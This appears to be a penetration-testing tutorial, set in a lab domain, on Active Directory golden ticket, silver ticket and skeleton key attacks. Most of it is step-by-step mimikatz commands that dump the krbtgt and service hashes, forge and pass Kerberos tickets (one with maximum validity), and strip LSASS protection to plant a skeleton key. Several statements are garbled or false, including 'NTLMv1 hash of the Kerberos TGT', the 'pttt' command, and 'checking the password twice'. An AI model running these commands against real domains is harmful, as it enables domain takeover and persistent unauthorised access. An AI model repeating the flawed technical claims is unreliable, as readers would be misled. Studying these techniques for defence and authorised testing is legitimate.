ON THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES 1. GOLDEN TICKET , 2. SILVER TICKET AND 3. SKELETON KEY

GOLDEN TICKET:

A golden ticket is a special token that is created by penetration testers using the Security Identifier (SID) of the domain, the domain name, and the NTLMv1 hash of the Kerberos TGT. The golden ticket allows a penetration tester to gain access to any device within the domain by performing PTT(Pass The Ticket). This is possible because the golden ticket is encrypted using the hash of the Kerberos TGT account, which is the built-in krbtgt account on Active Directory. However, the golden ticket is not digitally signed by the krbtgt account hash but is encrypted only. This golden ticket allows anyone to impersonate any user with the privileges associated with the impersonated user on systems within the domain. To make this type of attack even more awesome, imagine that changing the password for the krbtgt account has zero effect on mitigating this attack on Active Directory.

PRACTICAL DEMO:

  1. Fire up windows server 2022 and login as either Domain admin/SQLService
  2. Make sure mimikatz is installed beforehand.
  3. Open powershell with admin privileges, and launch mimikatz. dd_1
  4. Use Mimikatz to extract the domain SID and the Kerberos TGT account NTLM hash (krbtgt) using the following command:
lsadump::lsa /inject /name:krbtgt

dd_2

  1. Next, use Mimikatz to create a golden ticket by providing the domain SID and krbtgt NTLMv1 hash using the following command:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /ticket:golden_ticket

The username specified in the preceding command does not necessarily need to be a valid user on the domain. Furthermore, using the ID of 500 allows us to specify the administrator user account on the domain. The /ticket command enables us to specify the name of the ticket when it’s created. dd_3 The golden ticket is stored offline within the Mimikatz directory. This golden ticket will allow a penetration test to access any system on the domain using the current session.

  1. Creating a super golden ticket for maximum validity period:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /endin:2147483647 /ticket:super_golden_ticket

dd_4 /endin command enables us to specify the maximum validity of the ticket in minutes.

  1. pass the ticket with mimikatz:
kerberos::pttt golden_ticket

dd_5

  1. To open a Command Prompt with the golden ticket session, use the following Mimikatz command:
misc::cmd

dd_6

  1. On the cmd try these 2 command: dd_7 As shown in the preceding screenshot, when the whoami command is executed, the output shows the sqladmin account is currently logged on to the system but the klist command reveals this Command Prompt session is using the NotAdmin user with the golden ticket. Therefore, you can access any device on the network using the golden ticket on this Command Prompt session.
Note

As previously mentioned in this chapter, changing the krbtgt account password does not invalidate the tickets created by the krbtgt account; however, checking the password twice will invalidate the tickets.

Learn more about mimikatz


Silver ticket:

  1. Open the domain controller and login as either service account/DOMAIN ADMIN
  2. Then load mimikatz on powershell(Open as admin).
  3. Next, retrieve the SID of the domain and the NTLM hashes of a service account with a registered SPN or computer account:
lsadump::lsa /patch

dd_8 HASH OF THE DC{HYDRA-DC} dd_9

Important

You can also use the lsadump::lsa /inject /name:sqlservice command to retrieve the NTLM hash of a specific account with Mimikatz.

dd_10 4. Next, let’s use Mimikatz to create a silver ticket with a fake username, the domain name, the domain SID, the NTLM (RC4) hash of the Domain Controller (DC1), and the target as the domain controller. The service to impersonate will be the HOST:

kerberos::golden /user:SilverTicket /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /rc4:d74d80c4ca134b7558c663b13566a112 /id:1234 /target:HYDRA-DC.MARVEL.local /service:HOST /ticket:silver_ticket

dd_11 5. Now use the following command to perform PTT as well as get a cmd session: dd_12

dd_13


SKELETON KEY:

  1. Use the following commands to enable the Mimikatz drivers on the disk of the domain controller and create the skeleton key:
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

dd_14 2. Then open a command prompt using that skeleton key dd_15

Important

When using the skeleton key, you can access any device on the domain using a valid username and the password as Mimikatz. However, keep in mind any host you’re attempting to access with the skeleton key needs to authenticate to the domain controller on the network. If the domain controller reboots, the skeleton key is lost. However, the skeleton key being lost if the domain controller reboots is an important operational detail. Since Mimikatz manipulates authentication processes that are resident in memory, they are not persistent through reboots unless specific measures are taken to ensure persistence.

  1. On the new Cmd use the command powershell to spawn a powershell session. dd_16
  2. Access the domain controller using the following command:
 Enter-PSSession -ComputerName HYDRA-DC -credential MARVEL\Administrator
  1. Provide the password of the domain admin: dd_17
  2. Use the following commands to verify: dd_18

Further reading:

• Understanding Kerberos – https://www.techtarget.com/searchsecurity/definition/ Kerberos • OS Credential Dumping: NTDS – https://attack.mitre.org/techniques/T1003/003/ • OS Credential Dumping: LSA Secrets – https://attack.mitre.org/techniques/T1003/004/ • LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/ T1557/001/ • Active Directory Security – https://adsecurity.org/